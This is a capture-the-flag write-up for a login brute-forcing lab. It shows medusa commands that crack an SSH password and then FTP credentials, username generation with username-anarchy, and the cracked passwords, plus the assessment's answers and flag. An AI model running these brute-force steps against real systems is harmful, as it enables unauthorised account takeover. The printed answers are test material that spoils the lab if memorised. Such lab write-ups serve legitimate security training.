Skills Assessment Part 2 - Login Brute Forcing
Description:
This is the second part of the skills assessment. YOU NEED TO COMPLETE THE FIRST PART BEFORE STARTING THIS. Use the username you were given when you completed part 1 of the skills assessment to brute force the login on the target instance.
TARGET: 154.57.164.65:31810
Challenge 1
What is the username of the ftp user you find via brute-forcing?
Discovery
Since we are told there is an ftp server involved, and that we are looking for the username to access that ftp server, we need to first get into the target machine, to do that I will use the username we got from Skills Assessment Part 1 - Login Brute Forcing to brute force an ssh password, so that we can later establish an ssh session and connect directly to the ftp server
I will brute force the ssh password using the following medusa command and the already known username:
┌──(macc㉿kaliLab)-[~/htb/login_brute_forcing]
└─$ medusa -h 154.57.164.65 -n 31810 -u satwossh -P 2023-200_most_used_passwords.txt -M ssh -t 3
Output:
...
2026-04-02 13:27:03 ACCOUNT FOUND: [ssh] Host: 154.57.164.65 User: satwossh Password: password1 [SUCCESS]
...
- We got a hit!
Now we know the ssh password for the satwossh user, so we can start an ssh session, which will be the first step on getting to that ftp server we are targeting:
┌──(macc㉿kaliLab)-[~/htb/login_brute_forcing]
└─$ ssh satwossh@154.57.164.65 -p 31810
After entering our ssh password for user satwossh, we are now logged into the target's machine:
The authenticity of host '[154.57.164.65]:31810 ([154.57.164.65]:31810)' can't be established.
ED25519 key fingerprint is: SHA256:0ldLAJLTwIrE2wupFhvN1WiHuimct7AF+pBddY5xIi8
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[154.57.164.65]:31810' (ED25519) to the list of known hosts.
satwossh@154.57.164.65's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 6.18.9-talos x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
satwossh@ng-130206-loginbfsatwo-hf6dn-84d5c94d98-tjlt6:~$
Once we are inside the system and we know that what we are looking for is an FTP user, the next step is to identify any activity related to an FTP connection. The challenge makes it easier putting useful files in the directory we logged into:
satwossh@ng-130206-loginbfsatwo-hf6dn-84d5c94d98-tjlt6:~$ ls
IncidentReport.txt passwords.txt username-anarchy
Reading IncidentReport.txt:
satwossh@ng-130206-loginbfsatwo-hf6dn-84d5c94d98-tjlt6:~$ cat IncidentReport.txt
System Logs - Security Report
Date: 2024-09-06
Upon reviewing recent FTP activity, we have identified suspicious behavior linked to a specific user. The user **Thomas Smith** has been regularly uploading files to the server during unusual hours and has bypassed multiple security protocols. This activity requires immediate investigation.
All logs point towards Thomas Smith being the FTP user responsible for recent questionable transfers. We advise closely monitoring this user’s actions and reviewing any files uploaded to the FTP server.
- We discovered that the user related to the FTP activity has the name: "Thomas Smith", though we are not given a username.
Note we are also given the username-anarchy directory containing the username-anarchy executable, which we will use to create possible usernames for a user with the name "Thomas Smith". To do this traveled to the username-anarchy directory and ran the following command:
satwossh@ng-130206-loginbfsatwo-hf6dn-84d5c94d98-tjlt6:~/username-anarchy$ ./username-anarchy Thomas Smith > ../thomas_smith_usernames.txt
Look at the usernames that username-anarchy generated for us:
satwossh@ng-130206-loginbfsatwo-hf6dn-84d5c94d98-tjlt6:~$ cat thomas_smith_usernames.txt
thomas
thomassmith
thomas.smith
thomassm
thomsmit
thomass
t.smith
tsmith
sthomas
s.thomas
smitht
smith
smith.t
smith.thomas
ts
Now we are ready to brute-force the ftp username with an appropriate medusa command:
satwossh@ng-130206-loginbfsatwo-hf6dn-84d5c94d98-tjlt6:~$ medusa -h 127.0.0.1 -U thomas_smith_usernames.txt -P passwords.txt -M ftp -t 5
- I will also take advantage of the
passwords.txtfile already provided.- It has a bunch of passwords that may be worth trying
Output:
...
ACCOUNT FOUND: [ftp] Host: 127.0.0.1 User: thomas Password: chocolate! [SUCCESS]
...
- Found it!
flag: thomas
Challenge 2
What is the flag contained within flag.txt
Having already brute-forced the username and password used for the ftp server, we are ready to start an ftp session and retrieve the flag!
satwossh@ng-130206-loginbfsatwo-hf6dn-84d5c94d98-tjlt6:~$ ftp ftp://thomas:chocolate\!@localhost
- Remember we need to escape the "
!" character since it is a sensitive character in Bash.
Output (using ls and get):
Trying [::1]:21 ...
Connected to localhost.
220 (vsFTPd 3.0.5)
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||22069|)
150 Here comes the directory listing.
-rw------- 1 1001 1001 28 Sep 10 2024 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||10846|)
150 Opening BINARY mode data connection for flag.txt (28 bytes).
100% |************************************************************| 28 463.45 KiB/s 00:00 ETA
226 Transfer complete.
28 bytes received in 00:00 (98.00 KiB/s)
ftp> exit
221 Goodbye.
Then read the file to get the flag:
satwossh@ng-130206-loginbfsatwo-hf6dn-84d5c94d98-tjlt6:~$ cat flag.txt
HTB{brut3f0rc1ng_succ3ssful}
flag: HTB